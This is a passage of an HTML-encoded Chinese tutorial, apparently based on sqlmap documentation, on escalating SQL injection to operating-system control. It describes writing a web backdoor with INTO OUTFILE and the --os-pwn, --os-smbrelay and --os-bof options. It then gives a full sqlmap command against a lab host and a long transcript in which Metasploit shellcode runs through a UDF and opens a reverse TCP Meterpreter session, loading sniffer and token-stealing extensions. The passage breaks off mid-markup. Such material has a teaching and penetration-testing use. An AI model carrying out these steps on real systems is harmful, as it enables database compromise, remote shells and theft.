class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4e0d\u80fd\u6267\u884c\u591a\u8bed\u53e5\u7684\u65f6\u5019\uff08\u6bd4\u5982<span>php<\/span><span>\u6216\u8005<\/span><span>asp<\/span><span>\u7684\u540e\u7aef\u6570\u636e\u5e93\u4e3a<\/span><span>MySQL<\/span><span>\u65f6\uff09\uff0c\u4ecd\u7136\u53ef\u80fd\u4f7f\u7528<\/span><span>INTO&nbsp;OUTFILE<\/span><span>\u5199\u8fdb\u53ef\u5199\u76ee\u5f55\uff0c\u6765\u521b\u5efa\u4e00\u4e2a<\/span><span>web<\/span><span>\u540e\u95e8\u3002\u652f\u6301\u7684\u8bed\u8a00\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001<\/span><span>ASP<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001<\/span><span>ASP.NET<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001<\/span><span>JSP<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">4<span>\u3001<\/span><span>PHP<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Meterpreter%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">Meterpreter\u914d\u5408\u4f7f\u7528<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;os-pwn,&#8211;os-smbrelay,&#8211;os-bof,&#8211;priv-esc,&#8211;msf-path,&#8211;tmp-path<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\uff0c\u53ef\u4ee5\u5728\u6570\u636e\u5e93\u4e0e\u653b\u51fb\u8005\u76f4\u63a5\u5efa\u7acb<\/span><span>TCP<\/span><span>\u8fde\u63a5\uff0c\u8fd9\u4e2a\u8fde\u63a5\u53ef\u4ee5\u662f\u4e00\u4e2a\u4ea4\u4e92\u5f0f\u547d\u4ee4\u884c\u7684<\/span><span>Meterpreter<\/span><span>\u4f1a&nbsp;\u8bdd\uff0c<\/span><span>sqlmap<\/span><span>\u6839\u636e<\/span><span>Metasploit<\/span><span>\u751f\u6210<\/span><span>shellcode<\/span><span>\uff0c\u5e76\u6709\u56db\u79cd\u65b9\u5f0f\u6267\u884c\u5b83\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684<\/span><span>sys_bineval()<\/span><span>\u51fd\u6570\u5728\u5185\u5b58\u4e2d\u6267\u884c<\/span><span>Metasplit<\/span><span>\u7684<\/span><span>shellcode<\/span><span>\uff0c\u652f\u6301<\/span><span>MySQL<\/span><span>\u548c<\/span><span>PostgreSQL<\/span><span>\u6570\u636e\u5e93\uff0c\u53c2\u6570\uff1a<\/span><span>&#8211;os-pwn<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\u4e0a\u4f20\u4e00\u4e2a\u72ec\u7acb\u7684<\/span><span>payload<\/span><span>\u6267\u884c\uff0c<\/span><span>MySQL<\/span><span>\u548c<\/span><span>PostgreSQL<\/span><span>\u7684<\/span><span>sys_exec()<\/span><span>\u51fd\u6570\uff0c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u7684<\/span><span>xp_cmdshell()<\/span><span>\u51fd\u6570\uff0c\u53c2\u6570\uff1a<\/span><span>&#8211;os-pwn<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u901a\u8fc7<\/span><span>SMB<\/span><span>\u653b\u51fb<\/span><span>(MS08-068)<\/span><span>\u6765\u6267\u884c<\/span><span>Metasploit<\/span><span>\u7684<\/span><span>shellcode<\/span><span>\uff0c\u5f53<\/span><span>sqlmap<\/span><span>\u83b7\u53d6\u5230\u7684\u6743\u9650\u8db3\u591f\u9ad8\u7684\u65f6\u5019\uff08<\/span><span>Linux\/Unix<\/span><span>\u7684<\/span><span>uid=0<\/span><span>\uff0c<\/span><span>Windows<\/span><span>\u662f<\/span><span>Administrator<\/span><span>\uff09\uff0c<\/span><span>&#8211;os-smbrelay<\/span><span>\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">4<span>\u3001\u901a\u8fc7\u6ea2\u51fa<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2000<\/span><span>\u548c<\/span><span>2005<\/span><span>\u7684<\/span><span>sp_replwritetovarbin<\/span><span>\u5b58\u50a8\u8fc7\u7a0b<\/span><span>(MS09-004)<\/span><span>\uff0c\u5728\u5185\u5b58\u4e2d\u6267\u884c<\/span><span>Metasploit<\/span><span>\u7684<\/span><span>payload<\/span><span>\uff0c\u53c2\u6570\uff1a<\/span><span>&#8211;os-bof<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>MySQL<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/sqlmap\/mysql\/iis\/get_int_55.aspx?id=1&#8221;&nbsp;&#8211;os-pwn&nbsp;&#8211;msf-path&nbsp;\/software\/metasploit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:31]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;2003<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP.NET,&nbsp;ASP.NET&nbsp;4.0.30319,&nbsp;Microsoft&nbsp;IIS&nbsp;6.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;MySQL&nbsp;5.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:31]&nbsp;[INFO]&nbsp;fingerprinting&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:31]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system&nbsp;is&nbsp;Windows<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">how&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;establish&nbsp;the&nbsp;tunnel?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;TCP:&nbsp;Metasploit&nbsp;Framework&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;ICMP:&nbsp;icmpsh&nbsp;&#8211;&nbsp;ICMP&nbsp;tunneling<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:32]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;current&nbsp;user&nbsp;is&nbsp;DBA<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:32]&nbsp;[INFO]&nbsp;fetching&nbsp;current&nbsp;user<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">what&nbsp;is&nbsp;the&nbsp;back-end&nbsp;database&nbsp;management&nbsp;system&nbsp;architecture?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;32-bit&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;64-bit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;detecting&nbsp;back-end&nbsp;DBMS&nbsp;version&nbsp;from&nbsp;its&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:33]&nbsp;[INFO]&nbsp;retrieving&nbsp;MySQL&nbsp;base&nbsp;directory&nbsp;absolute&nbsp;path<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:34]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:34]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">how&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;execute&nbsp;the&nbsp;Metasploit&nbsp;shellcode&nbsp;on&nbsp;the&nbsp;back-end&nbsp;database&nbsp;underlying&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">operating&nbsp;system?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Via&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;&nbsp;(in-memory&nbsp;way,&nbsp;anti-forensics,&nbsp;default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Stand-alone&nbsp;payload&nbsp;stager&nbsp;(file&nbsp;system&nbsp;way)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:35]&nbsp;[INFO]&nbsp;creating&nbsp;Metasploit&nbsp;Framework&nbsp;multi-stage&nbsp;shellcode&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;connection&nbsp;type&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;use?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Reverse&nbsp;TCP:&nbsp;Connect&nbsp;back&nbsp;from&nbsp;the&nbsp;database&nbsp;host&nbsp;to&nbsp;this&nbsp;machine&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Reverse&nbsp;TCP:&nbsp;Try&nbsp;to&nbsp;connect&nbsp;back&nbsp;from&nbsp;the&nbsp;database&nbsp;host&nbsp;to&nbsp;this&nbsp;machine,&nbsp;on&nbsp;all&nbsp;ports&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">between&nbsp;the&nbsp;specified&nbsp;and&nbsp;65535<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;Bind&nbsp;TCP:&nbsp;Listen&nbsp;on&nbsp;the&nbsp;database&nbsp;host&nbsp;for&nbsp;a&nbsp;connection<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;is&nbsp;the&nbsp;local&nbsp;address?&nbsp;[192.168.136.1]&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;local&nbsp;port&nbsp;number&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;use?&nbsp;[60641]&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;payload&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;use?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Meterpreter&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Shell<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;VNC<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;creation&nbsp;in&nbsp;progress&nbsp;&#8230;&nbsp;done<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:43]&nbsp;[INFO]&nbsp;running&nbsp;Metasploit&nbsp;Framework&nbsp;command&nbsp;line&nbsp;interface&nbsp;locally,&nbsp;please&nbsp;wait..<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;_<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;o<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">_&nbsp;&nbsp;_&nbsp;&nbsp;_&nbsp;&nbsp;&nbsp;&nbsp;_&nbsp;_|_&nbsp;&nbsp;__,&nbsp;&nbsp;&nbsp;,&nbsp;&nbsp;&nbsp;&nbsp;_&nbsp;&nbsp;|&nbsp;|&nbsp;&nbsp;__&nbsp;&nbsp;&nbsp;&nbsp;_|_<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">\/&nbsp;|\/&nbsp;|\/&nbsp;|&nbsp;&nbsp;|\/&nbsp;&nbsp;|&nbsp;&nbsp;\/&nbsp;&nbsp;|&nbsp;&nbsp;\/&nbsp;\\_|\/&nbsp;\\_|\/&nbsp;&nbsp;\/&nbsp;&nbsp;\\_|&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;&nbsp;|&nbsp;&nbsp;|_\/|__\/|_\/\\_\/|_\/&nbsp;\\\/&nbsp;|__\/&nbsp;|__\/\\__\/&nbsp;|_\/|_\/<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\\|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;=[&nbsp;metasploit&nbsp;v3.7.0-dev&nbsp;[core:3.7&nbsp;api:1.0]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&nbsp;&#8212;&nbsp;&#8211;=[&nbsp;674&nbsp;exploits&nbsp;&#8211;&nbsp;351&nbsp;auxiliary<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&nbsp;&#8212;&nbsp;&#8211;=[&nbsp;217&nbsp;payloads&nbsp;&#8211;&nbsp;27&nbsp;encoders&nbsp;&#8211;&nbsp;8&nbsp;nops<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;=[&nbsp;svn&nbsp;r12272&nbsp;updated&nbsp;4&nbsp;days&nbsp;ago&nbsp;(2011.04.07)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">PAYLOAD&nbsp;=&gt;&nbsp;windows\/meterpreter\/reverse_tcp<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">EXITFUNC&nbsp;=&gt;&nbsp;thread<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">LPORT&nbsp;=&gt;&nbsp;60641<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">LHOST&nbsp;=&gt;&nbsp;192.168.136.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Started&nbsp;reverse&nbsp;handler&nbsp;on&nbsp;192.168.136.1:60641&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Starting&nbsp;the&nbsp;payload&nbsp;handler&#8230;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:48]&nbsp;[INFO]&nbsp;running&nbsp;Metasploit&nbsp;Framework&nbsp;shellcode&nbsp;remotely&nbsp;via&nbsp;UDF&nbsp;&#8216;sys_bineval&#8217;,&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">please&nbsp;wait..<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Sending&nbsp;stage&nbsp;(749056&nbsp;bytes)&nbsp;to&nbsp;192.168.136.129<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Meterpreter&nbsp;session&nbsp;1&nbsp;opened&nbsp;(192.168.136.1:60641&nbsp;-&gt;&nbsp;192.168.136.129:1689)&nbsp;at&nbsp;Mon&nbsp;Apr&nbsp;11&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">hh:mm:52&nbsp;+0100&nbsp;2011<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Loading&nbsp;extension&nbsp;espia&#8230;success.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Loading&nbsp;extension&nbsp;incognito&#8230;success.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;[-]&nbsp;The&nbsp;&#8216;priv&#8217;&nbsp;extension&nbsp;has&nbsp;already&nbsp;been&nbsp;loaded.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Loading&nbsp;extension&nbsp;sniffer&#8230;success.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;System&nbsp;Language&nbsp;:&nbsp;en_US<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">OS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Windows&nbsp;.NET&nbsp;Server&nbsp;(Build&nbsp;3790,&nbsp;Service&nbsp;Pack&nbsp;2).<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Computer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;W2K3R2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Architecture&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;x86<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 